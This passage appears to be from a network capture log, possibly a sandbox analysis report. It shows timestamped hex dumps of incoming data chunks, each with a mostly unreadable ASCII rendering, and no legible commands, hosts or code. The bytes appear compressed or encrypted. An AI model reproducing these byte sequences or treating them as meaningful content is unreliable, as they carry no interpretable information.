                                                                                                                                                                                    2023-01-05 07:59:31 UTC17180INData Raw: f5 b4 cd d6 4e bb 14 ce 6d 08 c4 10 07 ba 3a 82 ae af 0e 34 bb 18 5f 25 59 18 68 79 ff bc d8 a4 61 e8 fb 43 dc 73 00 00 67 18 72 2b e8 75 a2 ef c7 38 d4 56 3c d4 a2 bf b2 92 6c c0 e7 38 ec ef 0a a4 83 5d 46 6d bb 9d ff e9 72 e7 5f 88 82 39 f1 4a bf dd 64 84 35 cf 5e f8 b2 cc a9 71 98 aa 80 e1 08 fe 78 d4 4c a7 cb 82 25 e5 f0 36 b6 42 e6 68 d7 60 ac 2f 6f 50 1a 08 39 38 19 d9 2e db ba 73 81 90 72 26 c7 5d 95 e7 c9 11 33 c1 3e 4d b5 be 69 d0 e9 8c 55 fd 0c a1 df 5f 46 8d 77 85 3e 39 86 96 fc 98 52 86 88 3f d2 7f d4 6a de 1c b2 e8 be d2 ce c2 0f be c8 66 88 3e ba d1 77 ce 73 7f a0 4a 4a ea e2 c5 c0 a8 77 50 c7 6e c1 0a db bc 47 98 05 2b 1d 60 15 30 2d 77 ba 97 ae f7 e1 1b 1d 3f 24 84 99 54 5f b9 33 c4 bc 5a cc 6c c5 fd 4a 9f c1 55 c7 62 4d e1 1c 59 3d ba 5d
                                                                                                                                                                                    Data Ascii: Nm:4_%YhyaCsgr+u8V<l8]Fmr_9Jd5^qxL%6Bh`/oP98.sr&]3>MiU_Fw>9R?jf>wsJJwPnG+`0-w?$T_3ZlJUbMY=]
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17196INData Raw: 65 c6 33 e4 a3 9a ca e1 0d d1 30 f4 16 9b f5 0d de e2 10 81 6f 74 7a b6 ea dd 34 d0 cc 62 57 ed b8 27 8e 48 07 a1 4d 6c 8c 69 60 d9 d8 60 da 0b 6c 16 f9 01 f4 2e 92 cb 80 4c 0b a3 dc 7a 5b f9 94 3c fc 51 61 aa e5 c3 71 90 ca ec 1b ef 3e fe 47 6d e7 a7 e5 44 57 a8 08 c9 bc e1 26 29 11 07 71 09 fc 18 11 14 34 5f 17 56 16 f4 01 86 9b 2c 2e 8d b0 49 bc 21 87 ec e1 7e 66 83 26 d1 51 7c 00 98 01 f5 8c a6 3a d5 5e bd 4c b0 82 e0 0b 57 d3 5a f8 17 a4 6e 4e 48 9c a5 bc fe e6 21 39 f7 19 7c bd aa 44 66 b0 43 cf 08 7f 68 fc f4 27 c8 2b 4e 2c 74 13 e9 7d fa 15 dc fb 95 9a 11 50 b4 0e c7 39 24 06 5a 76 6c 91 86 fc 99 0f 5c 26 20 16 13 4b cf 52 61 0e f7 03 74 08 87 f3 cc b4 3e d3 39 5a f7 1c 75 0f 1f 1d b3 6d 2d c1 2b 03 89 53 6a d3 fb 68 a8 57 25 8d 8c ee 65 91 46 91
                                                                                                                                                                                    Data Ascii: e30otz4bW'HMli``l.Lz[<Qaq>GmDW&)q4_V,.I!~f&Q|:^LWZnNH!9|DfCh'+N,t}P9$Zvl\& KRat>9Zum-+SjhW%eF
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17212INData Raw: 2f 66 32 07 81 e4 d1 c9 0b 78 6a d5 07 be c1 65 d3 52 f3 db 53 a4 4a 9a cd 8b 80 01 6b 45 2a 6a 72 57 9a b3 57 d8 5d 17 03 56 dc d5 ee a6 25 d5 60 7e 3e d8 b1 bb 39 40 c1 55 b5 74 c4 53 d3 88 f1 2a fb 9c 13 04 b7 93 71 93 8a 28 04 14 08 cd fd 27 84 0a 86 8b 56 4e 18 00 83 93 6d b0 bb 01 fe 55 2d 0d e6 ed 78 8d 6f f9 0d 71 d7 0c 4e 77 d5 80 41 c0 36 e1 c1 f9 e3 05 13 82 f0 58 d9 bb 75 b2 d4 95 e3 91 03 7f 27 e6 b9 23 50 e7 6e 3d fe ab 49 c5 42 bb 94 e5 92 89 c2 11 c0 11 50 0e 8b 90 c5 fa 5d 85 07 11 15 4f 5d c9 8c a4 d2 c8 c4 25 f2 7e 32 b2 5e af 61 50 29 ac 0f a9 72 9b fd b5 13 32 6f 1f 4f 83 7f aa 5e 3c 78 59 e2 17 8f 58 1d e3 03 85 c2 4f d6 c5 6d 0b 44 b4 41 db a5 6c 58 6f 0c a3 34 c1 29 0e ff 12 de 33 47 d4 38 88 c0 53 55 ff 6b b4 3b f5 96 63 27 5c b1
                                                                                                                                                                                    Data Ascii: /f2xjeRSJkE*jrWW]V%`~>9@UtS*q('VNmU-xoqNwA6Xu'#Pn=IBP]O]%~2^aP)r2oO^<xYXOmDAlXo4)3G8SUk;c'\
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17228INData Raw: b7 fa 94 ad 65 6c 52 be fc dc 92 ee a2 89 fd 9f 5e e4 26 6e b4 e3 96 0e a7 ac 4d 21 82 af 35 27 05 4c 85 62 55 96 21 77 9c 00 4a 7f 4c 2c b8 b7 cc c6 f2 b0 66 8d ae 8d 33 a4 28 6c cf 44 43 0a ef 6a b1 6a 42 3e 17 04 2e 0a 89 d7 61 6b 43 fb 57 5c 47 17 c1 f1 02 a3 77 dd 5b a6 62 38 be f1 6e 3d db 34 eb 2d 1c fd 3f d3 29 47 d2 17 2e aa 34 8f 0b 1e ad 17 77 4a af 29 f3 31 51 33 82 cd c2 27 3b 0d ed 7b 60 38 69 f3 62 ed 97 69 63 16 53 61 f8 13 d0 f3 79 23 f6 f0 94 cf 97 f3 d0 42 6b 80 43 4c b7 0e 8d 0e f8 bf 07 87 60 37 4d e3 71 cd e6 be 69 64 e0 8c 7b 0c 9b 0e 9b 30 8e 31 76 1f 40 95 bf 4b 08 89 ff 1c 96 2e 18 68 db d1 48 17 f4 9f bf 60 bc a6 d5 c7 4d 82 72 1a f6 e9 f5 6c 90 10 08 d8 02 41 81 d7 02 41 1f 7c 68 4d 35 af 68 1d 92 46 9e 20 72 ba 6f a3 ae 1d a3
                                                                                                                                                                                    Data Ascii: elR^&nM!5'LbU!wJL,f3(lDCjjB>.akCW\Gw[b8n=4-?)G.4wJ)1Q3';{`8ibicSay#BkCL`7Mqid{01v@K.hH`MrlAA|hM5hF ro
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17244INData Raw: c3 e0 e7 17 6b a4 26 73 03 04 d5 70 3b a7 6d c0 57 20 55 fd af 58 c4 b1 da 34 ad 72 7b f0 c0 10 8b de bd 88 0f ed 1d 8d ce 8d b5 5b ee ed cd 5f 36 a8 eb 37 08 30 73 d3 d3 b5 c1 a6 1e 1b 63 2c b4 95 84 02 fd fa d2 78 31 b4 32 5f 7e cd 8d 2a 6a f6 33 60 90 4e e2 7c b1 97 8d 1e 34 db 54 81 5b 0e aa c8 12 d5 a9 b2 3c fd 72 1a d9 2c 77 c0 a3 e7 2f e7 f4 9d be c4 5a 89 d0 7b 92 3a 42 d8 a5 3a ca 2c c7 f2 51 16 b9 bb c4 2d 87 77 ec 4f 77 6b 59 6c 98 5c 8d f3 32 56 cf 7e 21 1d 5d 04 2d ca ce 25 52 55 4b 30 05 7c 07 65 99 45 e7 d9 70 ce f1 36 43 b1 34 ef f1 cd 49 79 93 36 a6 9f fb 39 05 5c ef 36 e0 78 6e 24 f9 c1 35 11 66 86 d2 d4 5c b8 26 5b 6b ec 2f 81 d3 19 60 f5 f5 6c 37 fd 00 0b 9d 1e 83 fb c8 b8 13 37 a2 9f 12 27 63 e1 e7 53 44 cd e3 12 4f cf 6d 79 1e 8f 4c
                                                                                                                                                                                    Data Ascii: k&sp;mW UX4r{[_670sc,x12_~*j3`N|4T[<r,w/Z{:B:,Q-wOwkYl\2V~!]-%RUK0|eEp6C4Iy69\6xn$5f\&[k/`l77'cSDOmyL
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17260INData Raw: 77 1a 7d 94 cb 86 0c a1 6f b3 47 5a de 88 9b 0c 02 be c6 0b 3c 32 63 22 42 68 48 76 0e c9 5e c1 a3 54 bc 40 79 46 5d 70 f8 9a 92 c7 c2 80 83 07 de 26 b5 b5 57 1b ea 0f aa 4f b2 15 58 06 61 84 92 78 ff 01 8e a0 2d 8b eb 63 96 5c bb e8 41 a2 59 ee ec d7 0f b4 ec 1b b8 d8 b0 3d 53 7c b7 05 7c 3d 1d 0a 9a 42 e5 62 95 6e 31 10 4d 7e 52 a9 37 a2 8b e9 63 aa 3d 21 7a 46 4a eb cb 53 ff fb 18 56 0d d3 17 64 81 11 0e 4d e0 04 34 a3 b2 0f 9a ea 08 b4 d0 c3 ad 18 d5 a3 e7 ce 2e 39 f3 5e 5c 32 5e e9 3b a8 8d a3 fe ab 07 10 56 96 5b a6 02 62 4c c3 d8 4d a0 de e1 a5 cc bc be 70 1c 8f 72 1f 99 05 5f 55 56 2f ab b2 e0 80 7b 15 a1 60 e2 6a 31 91 52 cc 13 37 b1 51 17 6e cb 07 05 9b 60 96 ff c7 03 7a e8 06 9a 5f 28 c3 29 30 db 4a 78 f1 0c 71 97 b0 3d e5 4c 08 79 28 65 42 3d
                                                                                                                                                                                    Data Ascii: w}oGZ<2c"BhHv^T@yF]p&WOXax-c\AY=S||=Bbn1M~R7c=!zFJSVdM4.9^\2^;V[bLMpr_UV/{`j1R7Qn`z_()0Jxq=Ly(eB=
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17276INData Raw: 1b 0a d2 c2 5b 19 82 f0 cd b3 d4 14 d1 d8 f8 e2 33 94 32 46 8b 73 60 1e 8c da 14 ba d0 1c 8a e6 39 6e a0 e2 9e ee 8a 48 94 42 5a 93 56 dd f4 36 db 0d 5f 6b d6 7f e6 73 c5 cf b3 e2 47 47 99 fc a1 7b 24 b7 a6 7c 2a ee e1 b3 03 46 f8 7e 1f d0 dd 05 e5 a4 43 e3 92 fa bd e6 2d ae ff 9c 13 56 ad 8c 0c b4 2c 6a be c9 eb bf 52 c6 17 51 e8 dc 05 20 90 35 7f a0 76 ec 5d f7 c0 38 e6 15 8b 8b 7a 90 2e 9b 73 6e 6e c1 50 d8 8a 05 c2 be 03 80 e3 2d 90 99 1a 55 b3 cf 42 f9 78 13 da c5 0f d4 8b 35 68 6a ae 77 77 36 5c 73 08 8a b4 66 dc de 87 b8 dd de 50 52 fc e7 f1 2b 79 85 65 8e c9 95 4c 9f da 79 b2 4b 20 60 ae 28 5a d8 26 c0 f1 90 7f 09 d8 07 1a c2 5c 1b 83 72 d0 95 80 a4 0c da e7 a4 84 26 43 e2 da e3 66 6e 40 f3 7f 68 e8 dc 51 43 7a fb 7d 27 87 89 e9 d6 90 53 d9 c4 a7
                                                                                                                                                                                    Data Ascii: [32Fs`9nHBZV6_ksGG{$|*F~C-V,jRQ 5v]8z.snnP-UBx5hjww6\sfPR+yeLyK `(Z&\r&Cfn@hQCz}'S
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17292INData Raw: 98 58 09 cb 20 37 55 41 58 99 a3 ef f3 d2 c6 b0 cd 43 63 ca de f8 ff 05 1b 0d a9 9f ee 44 22 ab 08 a9 f4 e3 4d e8 92 4e e8 37 9e f6 d3 ff 29 ce ff 29 c3 ae 7f b1 00 c7 bf 55 ba d5 a4 94 27 3a ca f8 57 d0 49 b1 ab 3e b0 56 53 64 f9 1e de 63 88 91 18 a1 a8 e6 17 74 3f 7c 92 5a da f3 f3 a5 2b 26 db db d1 d1 af 30 90 9a 69 68 68 c4 30 6b 33 7f 57 d9 df 65 d0 fd 8b bb 12 76 39 3f 32 ad 7a 5e 3f 74 a8 1b f6 c0 b0 de 69 0c 80 18 2d 30 47 22 5c af f9 bd 9b 53 af 00 3c 65 94 ac 1c 13 48 23 71 66 92 6c de e9 97 d2 a5 21 25 fa 71 c7 81 9f b9 2e 11 2a 7a 01 da ef bd fa 43 46 14 64 7c b4 31 0c da bb 73 3f 16 08 68 eb 98 ab 6e ba ed 05 a9 09 d0 01 d0 54 73 85 76 72 0d 5c 26 61 29 23 b1 79 cc 70 f6 a9 c9 6a 25 4d cf 33 29 d9 09 d2 ee a0 65 a1 21 3e e8 eb 42 d6 22 91 28
                                                                                                                                                                                    Data Ascii: X 7UAXCcD"MN7))U':WI>VSdct?|Z+&0ihh0k3Wev9?2z^?ti-0G"\S<eH#qfl!%q.*zCFd|1s?hnTsvr\&a)#ypj%M3)e!>B"(
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17308INData Raw: 20 d6 ca c2 4b 0f bb ec 41 e1 d6 5d 45 4d bc 39 99 85 a6 92 15 05 19 d5 f0 c6 84 a2 65 3b 36 03 c0 cc d5 01 66 86 c3 ed 85 30 b5 d5 7a cf 73 da 2f 22 8b e9 0e ab c5 b8 f5 8c 1d e7 2f 1a 87 42 fc 2d d2 0b 02 da 18 ba b9 dc 19 43 5f 24 41 53 e2 8b 6c c4 af d6 33 e3 de b8 8f 60 01 a9 c9 ac 8c 08 f6 e2 09 41 e3 d3 76 b9 f8 49 fc e4 c2 70 c6 90 3f f8 b2 8d 4c 4b 28 51 1a d8 23 f1 22 2d c8 a6 d1 42 29 25 be 77 9c 2e d4 1f a2 d8 a9 78 8d ed 20 35 b7 35 81 9d be d8 84 f2 2d 21 c0 92 c8 fa 76 ab 2c c6 99 c0 d5 af a9 cf ac 07 a9 a2 78 9f 14 3b e1 2f ba 94 cd 7f 6e 64 4e ac b8 f7 44 b5 7f ea c3 34 50 b7 d4 fe 31 16 7e 4f 5c 6a b5 8f 2b 44 86 53 e6 a9 54 1a fd 86 f5 57 67 4f 04 cf 9d 71 7f ad 08 dc a8 0a dd 10 96 b0 ec 40 2d e9 3b 9a b7 67 19 c3 a2 59 2e db ef fe 3b
                                                                                                                                                                                    Data Ascii: KA]EM9e;6f0zs/"/B-C_$ASl3`AvIp?LK(Q#"-B)%w.x 55-!v,x;/ndND4P1~O\j+DSTWgOq@-;gY.;
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17324INData Raw: b7 87 29 6b 28 6f 8f 9e 8b 9a 0f 1b d5 cd c8 4e 13 8c d6 77 b6 be 14 f0 9a c9 d4 c4 42 14 46 ae 30 14 4c 32 60 09 9d 8d 73 9e 96 35 01 14 43 4a bf 33 a2 e1 ad eb 6d 5b f3 14 0f 52 c9 8b ca 6d b3 11 30 00 d3 71 b1 9a 63 40 86 05 b5 38 78 b7 7f 33 b8 5d de f6 a2 49 39 c0 13 6a 1d 75 02 41 9f 43 cf 96 12 cf fa 09 3f 41 b2 22 5f 62 18 a6 11 b6 3d 08 0a d3 8e 0c f5 64 45 82 aa 39 16 07 ac 77 19 1c 55 bb 8a 43 8d 5d 1e 41 80 ca 1f b7 25 a3 ca c5 f1 53 c1 2d be e8 07 6c 5a 42 ac 2d 83 88 19 df 55 4d b3 d8 f3 fb 12 83 9c 5d ab b5 5a ce 6d ed fd 99 33 32 78 73 26 c4 eb 9f 29 6b 4a 8d 13 98 2c f4 8f 31 b9 de 40 4b 55 43 91 96 7e 3d 09 be 95 37 2b a0 f4 d5 eb 8f 23 b8 ea d4 5c 3e e8 5f c3 38 bd be 41 a3 33 e3 10 1f 25 cb 5d 25 3e 21 a1 d8 cf 39 64 1b 15 df 40 f2 28
                                                                                                                                                                                    Data Ascii: )k(oNwBF0L2`s5CJ3m[Rm0qc@8x3]I9juAC?A"_b=dE9wUC]A%S-lZB-UM]Zm32xs&)kJ,1@KUC~=7+#\>_8A3%]%>!9d@(
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17340INData Raw: d8 01 90 8e 2e 42 ca 21 04 ec 94 72 5c e4 74 24 f0 ee 7c 88 1c dd 62 d9 14 30 58 47 74 f3 26 89 06 ec d1 bd 67 bb bf 51 ed fa d4 c8 b8 80 0a c9 f0 19 fe d8 1b 82 5e 2b 9a d7 fd ae 60 43 05 79 96 53 16 31 67 b2 8e 25 1c 1e 77 93 bd 38 a3 ff 6f b0 b1 c7 97 85 a6 4d 1f 3b 75 a2 27 2b 2e a2 10 99 4e ea 9f b1 df ac 0d ab a5 fc 87 7d 65 d0 37 d7 47 31 d3 46 ea 07 af 5b 42 3d 7b f9 be f5 11 81 59 c4 3c 23 59 fe 98 05 e9 af 24 18 94 60 15 f0 5d df a1 02 02 ad f7 c7 63 46 93 d4 11 2b 61 87 28 50 d1 66 41 cb 64 58 da c6 5f 8d da f6 3e 4a 8d 9f 0d 82 6f 2c c6 05 77 88 14 9a ac ce 0f d6 49 66 77 e2 53 34 b3 9a fd 96 c2 f0 cc 3a 75 ed 77 a1 e0 df a0 19 ef dc 0a 97 6d 18 4f 4c dc 19 8e 8a 64 2b 5e b5 29 3f 36 1a 4e 5f 02 10 5d f1 05 4a e9 fa 5a 5e 53 07 81 a0 31 05 0b
                                                                                                                                                                                    Data Ascii: .B!r\t$|b0XGt&gQ^+`CyS1g%w8oM;u'+.N}e7G1F[B={Y<#Y$`]cF+a(PfAdX_>Jo,wIfwS4:uwmOLd+^)?6N_]JZ^S1
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17356INData Raw: 8c 6d bd ee 74 59 cf 96 33 f1 df 39 a9 0c 2f 61 e6 91 1c bd b7 76 c2 b9 eb e1 b6 b1 c9 21 26 2e 79 a5 44 7a b5 3b 31 76 50 ee d5 d7 c5 e6 19 52 12 c0 0d a8 f4 aa b1 2d 4b cc 22 ec c3 e4 25 88 02 92 c7 74 f2 42 8d df dd 44 e9 81 76 e8 6d a1 e3 11 28 d0 5e bd 5d 85 39 6d 3e 2c 1d a6 e3 2c bc a4 55 97 33 5b a6 21 e3 31 af 3f 62 26 58 2f b2 09 72 68 0e 38 87 57 c1 cb fd 1b 2e 8c 71 fb 4b 12 f7 ee 31 cb 41 9f 7d a1 35 5d 2f 39 56 c1 ed 76 22 9c 01 2b 50 46 dc 44 8e ce 0e 40 50 4e 5b 06 8c 63 d8 94 28 d2 52 f5 7b c5 da ca cb 99 88 3d dd 77 7e 0e 6a 96 2c 65 c9 22 7c 28 c4 65 01 a1 2a f2 6f ca 9e ab 52 15 79 ae d1 54 e0 af e9 2e 34 3a ff 45 eb aa 8b 25 70 cb 30 a3 15 de fa 9b 96 02 b4 9c 9e 38 47 b1 f3 da 7a 1c 42 d1 31 13 92 db 31 01 d8 be aa 9e 54 16 98 ad 4c
                                                                                                                                                                                    Data Ascii: mtY39/av!&.yDz;1vPR-K"%tBDvm(^]9m>,,U3[!1?b&X/rh8W.qK1A}5]/9Vv"+PFD@PN[c(R{=w~j,e"|(e*oRyT.4:E%p08GzB11TL
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17372INData Raw: 61 39 0d a1 54 79 25 a2 a6 b6 11 70 3b 5e bf 93 58 7e 38 82 78 8d ef 21 b9 8e 4f 34 f3 f1 9b 20 a5 7e 02 bb ad 97 43 0b e7 21 b4 4f d1 f1 70 79 bd 83 a6 e1 22 9a 22 77 69 a5 ea 72 fc 22 0b 37 63 1c 70 ea 01 f7 a8 69 5f 47 60 ab 7a 30 d4 86 c5 d7 3a 20 4f 52 9e de d5 c1 cf d2 cf 0d e9 13 78 96 c8 ee eb 78 43 3c f9 2b 0e 81 b7 d4 e5 f7 c7 04 b5 99 ba c6 c4 6e 5d 2c 7b 6e 72 d0 f6 c2 6d 59 0a d5 57 73 d8 bd a5 69 4f 76 37 91 4f bf 3f c0 9f ae 4c ab 18 fa 36 e8 26 d1 f1 c4 20 d8 86 c8 c9 48 ea 28 33 bc 0f e3 33 fc f2 02 f8 4e b2 f5 69 4c 72 4b 67 5a 43 9a be c1 d4 61 82 13 0f fa 42 26 de 43 de c3 16 1a 20 db f6 47 7f b9 76 f1 86 d5 fb d3 41 11 85 35 2a 6c 0c fe ab c5 42 27 41 45 5e 6e c9 e8 79 f4 79 3c c3 62 f7 94 24 9b 5f 2e 6f 65 82 86 ce 5c 60 e7 ef e9 a7
                                                                                                                                                                                    Data Ascii: a9Ty%p;^X~8x!O4 ~C!Opy""wir"7cpi_G`z0: ORxxC<+n],{nrmYWsiOv7O?L6& H(33NiLrKgZCaB&C GvA5*lB'AE^nyy<b$_.oe\`
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17388INData Raw: 92 26 e1 d6 4a 31 4e 08 04 c3 1c a2 0b 3d 6d 91 69 ad 52 8c d7 88 f8 f2 f3 13 74 81 dd 56 0e 69 22 f0 bf 7c 40 f1 a7 e5 e8 81 51 f2 7c 5d e6 e2 19 60 fd ab 54 3d 24 ac c5 63 b0 cd 31 3c 0c aa 60 65 c1 e2 c8 a6 c2 07 f6 18 fd 68 af 6a 12 3d 8e 65 b9 a5 70 7b 87 0e d1 fc 75 9f d4 15 b0 3c 79 ee a3 d6 7d cd 0a af fd 37 f7 64 87 b5 4d f4 b9 64 dd 78 52 80 47 9a 0b d4 3e 11 85 9a 71 bb 33 1d c9 ca b8 fd 6e 13 a7 9d a9 0e 1b 10 1a 2d b3 ae 31 2b db 27 86 d3 26 86 65 98 43 de cb 35 97 d9 18 55 34 6b de c8 72 52 48 9f b4 89 c8 bb 95 33 f9 23 54 20 df 79 d7 d0 41 2a 58 61 39 64 04 d2 cc 20 ab 73 4c 86 e8 cf 0a f1 11 9d 80 2b 46 b3 a3 a1 83 ed 57 37 1e 9c ed bf e6 64 57 99 a3 1a 87 9c 35 e1 48 96 3d 41 98 9b dd ca 9c 01 24 8b 8d 43 4d bc d0 6d 8d 7a 5f 45 e3 f3 71
                                                                                                                                                                                    Data Ascii: &J1N=miRtVi"|@Q|]`T=$c1<`ehj=ep{u<y}7dMdxRG>q3n-1+'&eC5U4krRH3#T yA*Xa9d sL+FW7dW5H=A$CMmz_Eq
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17404INData Raw: 7c ea f9 6e e5 49 dc ec 83 5d af 2a c0 25 5d d5 30 c6 05 d3 47 22 7f 76 f9 8d a4 6e 3e 07 f2 8d 3d f8 33 97 19 9b 92 22 67 94 ab 86 db 47 b9 32 ca 22 db 2a e7 b8 ad 56 e7 0b 23 f3 34 ee f2 a3 81 66 af 65 46 9c e5 7a 4e f5 dd 8c 2c bd 98 26 56 87 29 59 5f 4a 62 74 7d e6 c8 2c 9b 23 04 9e 85 35 43 93 15 53 20 95 78 dc 9a e4 7f d6 33 78 52 a0 4e 60 b3 04 72 96 98 ea 67 f1 64 d7 d3 5f 43 5e 93 06 8e 6b ad f0 0b f7 7d 4c e4 57 73 8e 38 48 86 f7 58 ee b5 17 26 89 60 95 21 4a 3c 47 3e 14 86 b1 1c b5 c9 89 cc 63 1c b8 1e 3d fd 50 90 db c8 8e fd 29 0c 21 ab 63 4c b9 45 bb 87 7e 43 bb ef 43 6f 82 db fb 62 cc 4b a0 aa 9e 14 14 2c b0 de 29 5e 32 2e 3f 1e f9 02 a3 c3 a4 28 a0 fc 5d dc 71 9f 32 5d 19 05 03 64 ff d1 4a 2e 91 99 6c bd b4 f4 cf 1e 31 0d a7 30 76 f0 a4 9a
                                                                                                                                                                                    Data Ascii: |nI]*%]0G"vn>=3"gG2"*V#4feFzN,&V)Y_Jbt},#5CS x3xRN`rgd_C^k}LWs8HX&`!J<G>c=P)!cLE~CCobK,)^2.?(]q2]dJ.l10v
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17420INData Raw: 07 ff 72 c8 ad a1 11 7e 0d 52 8e cd a1 90 6e 0c 6c d6 cc 54 87 7e 88 82 41 20 e7 00 bc 7d 7b 14 6f cc 4b 26 34 48 9a e2 98 ea b9 11 8c 0b 17 e3 d8 67 fa 16 ea 81 91 51 bc 8b c4 34 d3 f9 82 3f c9 0e ae 80 18 f8 24 49 5c 80 09 39 08 8e 98 15 45 01 46 66 65 c3 47 8c 2c 30 70 ef 85 cd 69 5a 4f 3a 8c e2 0b ff cf c0 dd 7e ca ee 3a d1 d1 f2 7d 91 4c 4a a1 5a 63 c3 6f d9 8e 77 73 8a 91 68 78 26 f9 35 7a a3 e8 aa 55 07 d1 12 d7 e8 e0 4e 1f a2 e0 6b 41 60 ba 4d 29 ce 41 f3 85 0c 25 97 7b 89 bd 3c 1c d2 10 54 21 5f 7b 46 6d 88 26 86 48 ec 4a 52 93 a4 b9 28 f9 76 41 69 cb d9 01 54 6e f3 4c a8 e3 bb 8c ae 70 b5 52 68 5f f5 57 d9 21 43 a4 fc ec 1e b8 0c 18 cb b2 2b 3d 7f 78 f4 2c 99 be 52 3e a3 66 b4 0b 08 a2 03 f6 ad 62 19 2e d4 fb 58 dd 65 11 4a f3 7c 01 37 41 43 ea
                                                                                                                                                                                    Data Ascii: r~RnlT~A }{oK&4HgQ4?$I\9EFfeG,0piZO:~:}LJZcowshx&5zUNkA`M)A%{<T!_{Fm&HJR(vAiTnLpRh_W!C+=x,R>fb.XeJ|7AC
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17436INData Raw: 36 b6 46 77 1d 7b db 5a d1 ad 1c 6c 07 ac fe a8 6e b8 37 80 c3 95 51 76 41 95 18 65 67 1e 04 1f 9e bd fb e0 c1 ac 98 26 10 1b 30 5d d5 5a ab fe c2 4d 88 03 57 5a 60 15 1a f1 ef 53 76 ef ad c5 0e 1f 30 e7 9d 04 db 8b 1d c3 a4 08 bc 00 46 7e 3f 37 1b e3 58 ce 75 7d 90 82 99 d9 7b dd 3a b5 8a 9b 43 61 2c 87 ea 8e e6 4f b2 58 ce 98 2d 88 3d 63 64 0b 82 1d 7f c5 f7 f3 3a 8a e3 22 84 6c 9c 34 23 b3 cf 4d 4d 30 4f a1 8c c6 bd 7c c0 53 74 95 5f 01 29 0f 9c 24 c1 b6 68 ee d0 66 5b 8b 13 19 1e 55 5d f5 5c c0 ed bf 84 51 40 e8 cc cc b1 20 05 9a 13 d7 d3 9e 88 92 8c f5 85 30 95 07 f9 c7 47 5e 2f 0a bd f8 66 af a8 55 94 54 88 90 6a ed a5 e1 37 83 c7 ba 83 c6 98 43 9b 9c a1 5e 5a a6 31 2f 0a e3 c8 b8 9f 3c 2e af d4 ca 49 a4 ac a7 b5 97 c5 8d 47 2f 95 aa 71 75 bf 21 3d
                                                                                                                                                                                    Data Ascii: 6Fw{Zln7QvAeg&0]ZMWZ`Sv0F~?7Xu}{:Ca,OX-=cd:"l4#MM0O|St_)$hf[U]\Q@ 0G^/fUTj7C^Z1/<.IG/qu!=
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17452INData Raw: 6d 37 2e 03 20 cf 43 9c b4 cf 9d fa ff 77 88 00 da 77 13 36 af 94 9c 67 c5 42 6c 12 0a 79 66 1b f4 96 98 29 25 b3 6a 70 2c b7 cb 12 e0 84 66 d5 73 ff be ff 49 85 8b 2e db 05 2b 48 3a 37 45 ed 41 d9 21 77 ac 3f 59 b9 b5 a2 c4 59 30 6f 2e e6 7c 59 5a 2b e9 4a 4c 1f 66 04 2a 1a 71 3a 10 32 e7 a2 6b 84 93 a8 62 33 1a 09 ca 8b 03 73 fb 9b d5 51 61 f5 e1 9e 85 6d 7e b2 83 d5 94 84 b9 f1 ef c1 40 08 e2 39 ce de 23 12 d2 49 f6 f8 f4 51 d7 4a 24 6d c3 2e 46 1e 63 b0 8c 4d 8a 2a c5 9a 48 c0 9e 8a ab 46 2c f5 96 67 b1 da ed cf 02 e6 c7 90 be 82 c8 d8 91 ca 97 76 98 34 3b e2 04 38 34 48 51 8b 82 0a 3f ec a0 32 bd 58 f5 dd 40 53 ba 50 70 5b 9e ad a5 b5 42 7a 30 29 7f a6 f3 e2 06 dc 5d 99 b2 6a 48 cb 00 b9 5e 21 b2 ef 74 77 0f 01 44 dd 40 b4 df 27 d2 88 23 97 b0 a0 3e
                                                                                                                                                                                    Data Ascii: m7. Cww6gBlyf)%jp,fsI.+H:7EA!w?YY0o.|YZ+JLf*q:2kb3sQam~@9#IQJ$m.FcM*HF,gv4;84HQ?2X@SPp[Bz0)]jH^!twD@'#>
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17468INData Raw: 81 7f 82 4a 54 d9 54 10 eb 50 09 21 1d f3 ff f5 9e 95 9b 6a b2 ba 5f cd ba df af 77 f7 55 0c da 32 a6 31 20 cd 78 ca a2 4e ff 82 a4 29 3c 19 2a b3 7a b5 d9 0a e8 1d 45 33 da 6e 6f 68 ca 5b b5 06 49 a1 5a ec 3d 76 20 46 9c 13 b2 b2 52 f4 ab 91 00 f2 d6 20 68 30 e2 be 19 59 01 ef ff 88 f0 2b e2 c1 44 af e5 f8 45 cb 5f f6 07 18 a0 87 29 79 98 88 7b bd e7 49 1d 9c b4 c7 7a 42 51 20 72 96 df 8a fa 18 5d 4b 64 e9 fe d1 07 f5 4a 43 7e 3d a2 6a f5 5d e4 2e 05 1e 60 bd 0a d7 b5 18 6b a5 ae 13 cf 57 c8 6e a6 36 4b 73 1d 80 32 4a 9a a8 3b 13 82 8f e5 91 9c 1f 86 c8 66 fc 1c 2b 38 38 46 de a6 5e 9a a7 40 a8 90 64 47 3f 74 49 e0 9c 5a 3f a3 7f 31 b0 b0 3c 94 ae 25 b2 56 aa 69 1f e4 ea 24 47 15 cc 42 12 55 95 6a d7 61 ef 18 4a d7 a0 d0 12 c2 b4 3d fe 9c 6b 06 e4 f7 c3
                                                                                                                                                                                    Data Ascii: JTTP!j_wU21 xN)<*zE3noh[IZ=v FR h0Y+DE_)y{IzBQ r]KdJC~=j].`kWn6Ks2J;f+88F^@dG?tIZ?1<%Vi$GBUjaJ=k
